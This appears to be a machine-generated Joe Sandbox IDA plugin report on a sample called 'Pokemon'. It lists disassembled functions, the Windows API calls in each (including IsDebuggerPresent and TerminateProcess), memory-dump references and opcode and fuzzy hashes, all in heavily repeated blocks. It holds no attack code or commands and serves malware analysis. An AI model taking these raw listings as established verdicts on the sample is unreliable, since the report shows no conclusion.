                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                      • Opcode ID: 420cae7e561288056403d2a5a96e4a817b33a2079fdc21a8eca4966eb22787e2
                                                                                                                                                                                                                                                                                      • Instruction ID: 5725552e2d63d62e6714f50f3c55fa846ea2c2d207adadcc61feaad26ab7b89f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 420cae7e561288056403d2a5a96e4a817b33a2079fdc21a8eca4966eb22787e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FF0F63490060CB7DB14BAA8DC469DF77AC5F00350B608521FD24A65E3FB70EA59CAD1
                                                                                                                                                                                                                                                                                      Function 001189B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00118D52
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00118D59
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00118F3A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f04432e03db3e540cd97337d8451fde684ee84206e138748e6c3c40db94f0723
                                                                                                                                                                                                                                                                                      • Instruction ID: 45750e08f557151386bbaba22e24dc92b7ef0cfc4f11463544da31c0e0e587a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f04432e03db3e540cd97337d8451fde684ee84206e138748e6c3c40db94f0723
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D126D719083419FC714DF28C484B9ABBE5FF85314F14896DE8899B392DB31ED85CB92
                                                                                                                                                                                                                                                                                      Function 00119AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c2d65f2742b7bca25298b02ee3fed6fbd5e7a25cf8269e4cf07beb1c9b55b487
                                                                                                                                                                                                                                                                                      • Instruction ID: f627ee65b9bd2de1d454cef78ec578bb63d99db0ddf335b49c49f6b400d594be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d65f2742b7bca25298b02ee3fed6fbd5e7a25cf8269e4cf07beb1c9b55b487
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84A16931604615EFCB1CDF58D5E19E9BBA1FF46314B2084ADE85A8F292DB31ED81CB80
                                                                                                                                                                                                                                                                                      Function 00092793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000932AF
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 000932B7
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000932C2
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000932CD
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 000932D5
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 000932DD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093205: RegisterWindowMessageW.USER32(00000004,?,00092964), ref: 0009325D
                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00092A0A
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32 ref: 00092A28
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 000D3A0D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9e5ddfca5dd245655ef5d100a2c4d705b1c6d8561ac41a4385c3f64ed86a04e4
                                                                                                                                                                                                                                                                                      • Instruction ID: 231ba5d2a3f8b648153449e049b3d99c11ac477b1451b283311e3ac51fc766f7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5ddfca5dd245655ef5d100a2c4d705b1c6d8561ac41a4385c3f64ed86a04e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A71BEB0901A008FCBA8DF79FE696953AE4FB58344310812AE40AD7BB2EBF045C1DF55
                                                                                                                                                                                                                                                                                      Function 000AFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000961A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00096299
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 000AFD36
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000AFD45
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000EFE33
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dbd46a3d11bb552bf7e4e989245dbf02864330de05d6c94218b4ae5066e13571
                                                                                                                                                                                                                                                                                      • Instruction ID: fcf48cf82e930dc057e3bdf737cfc0947cee84329014c0567b9383b064840f8b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbd46a3d11bb552bf7e4e989245dbf02864330de05d6c94218b4ae5066e13571
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B31C571904384AFEB72CF65C845BFABBEDAB02308F0004AED599A7242C3746A85CB51
                                                                                                                                                                                                                                                                                      Function 000C970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,000C97BA,FF8BC369,00000000,00000002,00000000), ref: 000C9744
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,000C97BA,FF8BC369,00000000,00000002,00000000,?,000C5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,000B6F41), ref: 000C974E
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000C9755
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 972ba3d9c0ca63fba2845b3df9bb7a9aac0fed25446a13eda0187a5937762468
                                                                                                                                                                                                                                                                                      • Instruction ID: 2796fa3f3dfb67022a2fbc356caedfd5e161c15c980f89624d89824fe7e7454f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 972ba3d9c0ca63fba2845b3df9bb7a9aac0fed25446a13eda0187a5937762468
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E014C32624515BBCB159F99EC09DAE3B69EB85330B24034DF811972A0EA70DD919B90
                                                                                                                                                                                                                                                                                      Function 0009F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0009F27B
                                                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0009F289
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009F29F
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009F2B1
                                                                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 000E32D8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 129295773040bef8c3d86e2e660905efe2d2404a3316adce49bcf6f542283e65
                                                                                                                                                                                                                                                                                      • Instruction ID: c6d43df8fc05545c0f1794582c44f79a3d52bf8a0b8148f63aa57c1813f4a80f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 129295773040bef8c3d86e2e660905efe2d2404a3316adce49bcf6f542283e65
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F08230204385ABEBB0CBA0DC49FEA77ECEB84344F104929E249E30D0DB7495C8DB25
                                                                                                                                                                                                                                                                                      Function 000A2B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 000A3006
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                                                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                      • Opcode ID: 976139edc3e61bf713c19b3cbad1242b35574b8f3eecaef3c15bbbc9379e7e25
                                                                                                                                                                                                                                                                                      • Instruction ID: cb8365d40c46ab3ca6f427b417f16e7c33d4e29d75b0fca21fb436660e2addb5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 976139edc3e61bf713c19b3cbad1242b35574b8f3eecaef3c15bbbc9379e7e25
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3022AD70608341DFC724DF58C880A6ABBF1BF86314F24892DF49A9B3A2D771E941CB52
                                                                                                                                                                                                                                                                                      Function 000A1990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 71ef7c1e9a6747b17347ba09a9eb27d98965a20bf54177201cfb38b6d10567a2
                                                                                                                                                                                                                                                                                      • Instruction ID: a538583b158f113280024bdc90faf737795ca466885a91753ea2e3e8f5a187d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71ef7c1e9a6747b17347ba09a9eb27d98965a20bf54177201cfb38b6d10567a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F132D130A00245DFCF24DF95D881AEEB7B5FF25354F148568E855AB2A2E732ED80CB51
                                                                                                                                                                                                                                                                                      Function 00093A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 000D413B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00093A76
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                                                                      • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c2448534bb2710164a8fadaa6512089a75b455373645fb5584727f2d6e35e7a
                                                                                                                                                                                                                                                                                      • Instruction ID: dc85cf5a29fc62ed46aba8269b5d6a446ea61314738459ec095f4a07f81f5ff4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c2448534bb2710164a8fadaa6512089a75b455373645fb5584727f2d6e35e7a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26218171A002589BDF119F94D805BEE7BF8AF49304F00805AE545BB382DBB49A899FA1
                                                                                                                                                                                                                                                                                      Function 0009396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00093A3C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 47942214b610ff059bf5ae92eb1228ea9d1c0c220348abac324c5e2792de7d7c
                                                                                                                                                                                                                                                                                      • Instruction ID: dabd8e89a18f026b9c95cfea86710bf7b4cc57ca39c7f7e1af679ce1209c5638
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47942214b610ff059bf5ae92eb1228ea9d1c0c220348abac324c5e2792de7d7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 603191706047019FD760DF25D885797BBE8FB49318F00092EE6D987781E7B5A988CF52
                                                                                                                                                                                                                                                                                      Function 0009331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 0009333D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000932E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000932FB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000932E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00093312
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00093368,?), ref: 000933BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00093368,?), ref: 000933CE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00162418,00162400,?,?,?,?,?,?,00093368,?), ref: 0009343A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000934BB
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00093377
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f9f1ddfdbeebc5573ceec9ffa76890a3e88898e33bdbb17c6a66187cfa229e1f
                                                                                                                                                                                                                                                                                      • Instruction ID: e67419ac6d64da6e529d6369d34399d8cb4560c35d60f7ee4e9bd07eae7d4f78
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9f1ddfdbeebc5573ceec9ffa76890a3e88898e33bdbb17c6a66187cfa229e1f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2F05431554B44AFD7116F60FC0ABA43790B70870AF008815F60556AE3DBF952D19F40
                                                                                                                                                                                                                                                                                      Function 000AF950 Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 000AF96C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009EE4C: GetInputState.USER32 ref: 0009EF07
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 000EFB22
                                                                                                                                                                                                                                                                                      Memory Dump Source
